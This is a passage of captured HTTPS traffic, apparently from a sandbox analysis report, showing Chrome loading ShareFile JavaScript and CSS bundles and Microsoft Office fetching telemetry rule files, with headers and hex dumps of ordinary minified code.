                                                                                                                                                                                                                                                                                Last-Modified: Thu, 19 Sep 2024 10:07:36 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                ETag: "ec10a08abeea396244c7c88ffaa5ecf7"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 c379418fd6100691807f32f274ebe9ce.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: SGuz7ZJeU2ruz6VxvQ8MuzUw5BMSok8Ocjlm_RdnVOoiz3tsMNtx5Q==
                                                                                                                                                                                                                                                                                Age: 45976
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC15774INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 75 73 65 72 61 63 74 68 69 73 74 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6e 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 2e 41 6c 65 72 74 3d 65 2e 41 6c 65 72 74 2c 72 2e 42 75 74 74 6f 6e
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevuseracthistpilet,{})System.register(["antd","react","react-dom","tslib"],(function(e,t){var r={},n={},o={},i={};return Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){r.Alert=e.Alert,r.Button
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC16384INData Raw: 69 73 2e 69 73 42 72 6f 77 73 65 72 28 22 65 64 67 65 22 29 7c 7c 74 68 69 73 2e 69 73 42 72 6f 77 73 65 72 28 22 73 61 66 61 72 69 22 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 42 72 6f 77 73 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6e 61 76 69 67 61 74 6f 72 26 26 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 63 6c 75 64 65 73 28 65 29 7d 2c 65 7d 28 29 3b 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 76 61 72 20 74 3d 6e 65 77 20 69 28 65 29 2c 72 3d 74 2e 73 65 67 6d 65 6e 74 28 29 3b 72 65 74 75 72 6e 20 72 2e 6c 65 6e 67 74 68 3c 32 3f 65 3a 74 2e 70 61 74 68 6e 61 6d 65 28 22 22 29 2e 71 75 65 72 79 28
                                                                                                                                                                                                                                                                                Data Ascii: is.isBrowser("edge")||this.isBrowser("safari")},e.prototype.isBrowser=function(e){return"undefined"!=typeof navigator&&navigator.userAgent.toLowerCase().includes(e)},e}();function P(e){var t=new i(e),r=t.segment();return r.length<2?e:t.pathname("").query(
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC16384INData Raw: 74 29 3a 6e 2e 69 73 41 72 72 61 79 28 74 29 3f 74 2e 73 6c 69 63 65 28 29 3a 74 7d 66 75 6e 63 74 69 6f 6e 20 69 28 72 29 7b 72 65 74 75 72 6e 20 6e 2e 69 73 55 6e 64 65 66 69 6e 65 64 28 74 5b 72 5d 29 3f 6e 2e 69 73 55 6e 64 65 66 69 6e 65 64 28 65 5b 72 5d 29 3f 76 6f 69 64 20 30 3a 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 5b 72 5d 29 3a 6f 28 65 5b 72 5d 2c 74 5b 72 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 69 66 28 21 6e 2e 69 73 55 6e 64 65 66 69 6e 65 64 28 74 5b 65 5d 29 29 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 74 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 72 29 7b 72 65 74 75 72 6e 20 6e 2e 69 73 55 6e 64 65 66 69 6e 65 64 28 74 5b 72 5d 29 3f 6e 2e 69 73 55 6e 64 65 66 69 6e 65 64 28 65 5b 72 5d 29 3f 76 6f 69 64
                                                                                                                                                                                                                                                                                Data Ascii: t):n.isArray(t)?t.slice():t}function i(r){return n.isUndefined(t[r])?n.isUndefined(e[r])?void 0:o(undefined,e[r]):o(e[r],t[r])}function s(e){if(!n.isUndefined(t[e]))return o(undefined,t[e])}function a(r){return n.isUndefined(t[r])?n.isUndefined(e[r])?void
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC16384INData Raw: 76 20 6d 69 6c 20 6e 6f 6d 20 6f 72 67 20 70 72 64 20 74 6d 20 22 2c 6d 6b 3a 22 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 69 6e 66 20 6e 61 6d 65 20 6e 65 74 20 6f 72 67 20 70 72 6f 20 22 2c 6d 6c 3a 22 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 6e 65 74 20 6f 72 67 20 70 72 65 73 73 65 20 22 2c 6d 6e 3a 22 20 65 64 75 20 67 6f 76 20 6f 72 67 20 22 2c 6d 6f 3a 22 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 6e 65 74 20 6f 72 67 20 22 2c 6d 74 3a 22 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 6e 65 74 20 6f 72 67 20 22 2c 6d 76 3a 22 20 61 65 72 6f 20 62 69 7a 20 63 6f 6d 20 63 6f 6f 70 20 65 64 75 20 67 6f 76 20 69 6e 66 6f 20 69 6e 74 20 6d 69 6c 20 6d 75 73 65 75 6d 20 6e 61 6d 65 20 6e 65 74 20 6f 72 67 20 70 72 6f 20 22 2c 6d 77 3a 22 20 61 63 20 63 6f 20 63 6f 6d 20
                                                                                                                                                                                                                                                                                Data Ascii: v mil nom org prd tm ",mk:" com edu gov inf name net org pro ",ml:" com edu gov net org presse ",mn:" edu gov org ",mo:" com edu gov net org ",mt:" com edu gov net org ",mv:" aero biz com coop edu gov info int mil museum name net org pro ",mw:" ac co com
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC16384INData Raw: 65 70 74 73 20 61 20 73 74 72 69 6e 67 2c 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6f 72 20 6f 62 6a 65 63 74 20 61 73 20 74 68 65 20 6e 61 6d 65 20 70 61 72 61 6d 65 74 65 72 22 29 7d 73 77 69 74 63 68 28 63 28 72 29 29 7b 63 61 73 65 22 55 6e 64 65 66 69 6e 65 64 22 3a 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3b 63 61 73 65 22 42 6f 6f 6c 65 61 6e 22 3a 72 65 74 75 72 6e 20 72 3d 3d 3d 42 6f 6f 6c 65 61 6e 28 6c 28 65 5b 74 5d 29 3f 65 5b 74 5d 2e 6c 65 6e 67 74 68 3a 65 5b 74 5d 29 3b 63 61 73 65 22 46 75 6e 63 74 69 6f 6e 22 3a 72 65 74 75 72 6e 21 21 72 28 65 5b 74 5d 2c 74 2c 65 29 3b 63 61 73 65 22 41 72 72 61 79 22 3a 72 65 74 75 72 6e 21 21 6c 28 65 5b 74 5d 29 26 26 28 6e 3f 68 3a 66 29 28 65 5b 74 5d 2c 72 29 3b 63 61 73 65 22
                                                                                                                                                                                                                                                                                Data Ascii: epts a string, regular expression or object as the name parameter")}switch(c(r)){case"Undefined":return t in e;case"Boolean":return r===Boolean(l(e[t])?e[t].length:e[t]);case"Function":return!!r(e[t],t,e);case"Array":return!!l(e[t])&&(n?h:f)(e[t],r);case"
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC10434INData Raw: 72 74 73 2e 70 72 6f 74 6f 63 6f 6c 26 26 28 72 2b 3d 74 2e 5f 70 61 72 74 73 2e 70 72 6f 74 6f 63 6f 6c 2b 22 3a 2f 2f 22 29 2c 74 2e 5f 70 61 72 74 73 2e 68 6f 73 74 6e 61 6d 65 26 26 28 74 2e 69 73 28 22 70 75 6e 79 63 6f 64 65 22 29 26 26 65 3f 28 72 2b 3d 65 2e 74 6f 55 6e 69 63 6f 64 65 28 74 2e 5f 70 61 72 74 73 2e 68 6f 73 74 6e 61 6d 65 29 2c 74 2e 5f 70 61 72 74 73 2e 70 6f 72 74 26 26 28 72 2b 3d 22 3a 22 2b 74 2e 5f 70 61 72 74 73 2e 70 6f 72 74 29 29 3a 72 2b 3d 74 2e 68 6f 73 74 28 29 29 2c 74 2e 5f 70 61 72 74 73 2e 68 6f 73 74 6e 61 6d 65 26 26 74 2e 5f 70 61 72 74 73 2e 70 61 74 68 26 26 22 2f 22 21 3d 3d 74 2e 5f 70 61 72 74 73 2e 70 61 74 68 2e 63 68 61 72 41 74 28 30 29 26 26 28 72 2b 3d 22 2f 22 29 2c 72 2b 3d 74 2e 70 61 74 68 28 21
                                                                                                                                                                                                                                                                                Data Ascii: rts.protocol&&(r+=t._parts.protocol+"://"),t._parts.hostname&&(t.is("punycode")&&e?(r+=e.toUnicode(t._parts.hostname),t._parts.port&&(r+=":"+t._parts.port)):r+=t.host()),t._parts.hostname&&t._parts.path&&"/"!==t._parts.path.charAt(0)&&(r+="/"),r+=t.path(!


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                80192.168.2.64980713.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:17 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 415
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                                                                x-ms-request-id: e268cc1a-b01e-001e-5327-1a0214000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180517Z-185b7d577bdpw7zm61hgr6fwxc00000001g0000000009b7s
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                81192.168.2.64976813.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:17 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 2160
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                                                                                x-ms-request-id: c8ae7944-b01e-0002-48f9-191b8f000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180517Z-185b7d577bdt2k4f7f9nr1pp7s000000010g00000000dpfp
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                82192.168.2.64980813.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC573OUTGET /sharefile-web/sharefiledev-doc-gen-pilet/1.2.88/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC528INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 01 Oct 2024 10:45:21 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:03 GMT
                                                                                                                                                                                                                                                                                ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 2bbba694ff55d664208103e9c25dce14.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: ddbkipuIeGEljz2X4-YxzjhYP9yF9VBNt6m3PIN-Q3FnSqrE7L36Ww==
                                                                                                                                                                                                                                                                                Age: 45975
                                                                                                                                                                                                                                                                                Vary: Origin


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                83192.168.2.64980913.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC579OUTGET /sharefile-web/sharefiledev-notification-center/0.58.0/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC528INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Thu, 01 Aug 2024 17:12:16 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:03 GMT
                                                                                                                                                                                                                                                                                ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 2bbba694ff55d664208103e9c25dce14.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 9R6WoIS4mWSdyhClNeRNvAL13AJNwjQvoa0wYzf1L1HB2bFLwy8PAw==
                                                                                                                                                                                                                                                                                Age: 45975
                                                                                                                                                                                                                                                                                Vary: Origin


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                84192.168.2.64981013.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC576OUTGET /sharefile-web/sharefiledev-publisher-pilet/0.17.11/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC528INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 26 Aug 2024 20:27:12 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:03 GMT
                                                                                                                                                                                                                                                                                ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 cb33a7a4640adbb55df3e0d143601558.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: vCfNA9b9eth81_NlHt8ToK2sgXF-ud3qa8Z6lFvexSQusKyqN3-fuw==
                                                                                                                                                                                                                                                                                Age: 45975
                                                                                                                                                                                                                                                                                Vary: Origin


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                85192.168.2.64981113.224.189.1154432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC427OUTGET /sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 904512
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 05 Mar 2024 06:32:15 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                ETag: "4bca71b5e96ba1017d2f126850c99835"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 172e63b20fb363ed969de28ae3937e20.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: v-OpYs7Qi9CYvh5Zr7UCsNe8t52YntACTZylg1lbtpBbBB67iqgydQ==
                                                                                                                                                                                                                                                                                Age: 45976
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC15835INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 74 68 72 65 61 74 61 6c 65 72 74 6d 67 74 70 69 6c 65 74 2c 7b 22 40 63 69 74 72 69 74 65 2f 63 69 74 72 69 78 2d 75 69 40 32 35 2e 34 36 2e 30 22 3a 22 63 69 74 72 69 74 65 2d 63 69 74 72 69 78 2d 75 69 2e 6a 73 22 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 72 65 61 63 74 22 2c 22 40 63 69 74 72 69 74 65 2f 63 69 74 72 69 78 2d 75 69 40 32 35 2e 34 36 2e 30 22 2c 22 74 73 6c 69 62 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevthreatalertmgtpilet,{"@citrite/citrix-ui@25.46.0":"citrite-citrix-ui.js"})System.register(["react","@citrite/citrix-ui@25.46.0","tslib","react-dom"],(function(e,t){var n={},r={},o={},i={};return Object.defineProper
